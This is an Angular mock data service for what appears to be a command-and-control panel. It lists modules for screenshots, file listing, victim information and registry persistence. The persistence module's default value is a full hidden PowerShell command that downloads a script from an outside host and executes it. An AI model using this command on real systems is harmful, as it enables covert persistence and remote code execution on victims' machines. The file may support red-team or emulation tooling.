import { Injectable } from '@angular/core';
import { C2ModulesRequest, C2ModulesData } from '../data/c2modules';
import { Observable, of } from 'rxjs';

@Injectable()
export class C2ModulesMockService extends C2ModulesData {
  constructor() {
    super('C2MODULES', [
      {
        KillBot: {
          name: 'KillBot',
          description: 'Kills malware.',
          payload_family: 'windows/powershell',
          variables: [],
        },
        SafeScreenshot: {
          name: 'SafeScreenshot',
          description:
            'Get screenshot of users display and save in his documents folder.',
          payload_family: 'windows/powershell',
          variables: {},
        },
        ListFiles: {
          name: 'ListFiles',
          description: 'List files from specified directory',
          payload_family: 'windows/powershell',
          variables: {
            directory: {
              description: 'Directory',
              placeholder: 'Directory',
              type: 'text',
              value: '$env:USERPROFILE',
            },
          },
        },
        AddRegPersistence: {
          name: 'AddRegPersistence',
          description: 'Create registry-based persistence',
          payload_family: 'windows/powershell',
          variables: {
            Hive: {
              description: 'Hive',
              placeholder: 'HKLM or HKCU',
              type: 'text',
              value: 'HKCU',
            },
            Name: {
              description: 'Entry name',
              placeholder: 'ThreatProviderC2',
              type: 'text',
              value: 'ThreatProviderC2',
            },
            Cmd: {
              description: 'Powershell cmd to execute',
              placeholder: '',
              type: 'text',
              value:
                'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c `"sleep 11;`$w=new-object net.webclient;`$w.UseDefaultCredentials=`$true;`$w.Proxy.Credentials=`$w.Credentials;iex(`$w.downloadstring(\'http://rekruteka.pl/status/?__utma=reg\'))`"',
            },
          },
        },
        GetInfo: {
          name: 'GetInfo',
          description: 'Receive basic information about victim',
          payload_family: 'windows/powershell',
          variables: [],
        },
        GetScreenshot: {
          name: 'GetScreenshot',
          description: 'Get screenshot of user`s display',
          payload_family: 'windows/powershell',
          variables: {},
        },
      },
      {
        KillBot: {
          name: 'KillBot',
          description: 'Kills malware.',
          payload_family: 'unix/powershell',
          variables: [],
        },
        ListFiles: {
          name: 'ListFiles',
          description: 'List files from specified directory',
          payload_family: 'unix/sh',
          variables: {
            directory: {
              description: 'Directory',
              placeholder: 'Directory',
              type: 'text',
              value: '',
            },
          },
        },
        GetInfo: {
          name: 'GetInfo',
          description: 'Receive basic information about victim',
          payload_family: 'unix/sh',
          variables: [],
        },
      },
    ]);
  }

  public getModules(req: C2ModulesRequest): Observable<any> {
    const d: Array<any> = this.data as Array<any>;
    if (req.payload_family === 'windows/powershell') return of(d[0]);
    else if (req.payload_family === 'unix/sh') return of(d[1]);
    else return of({ statun: 'unknown' });
  }
}
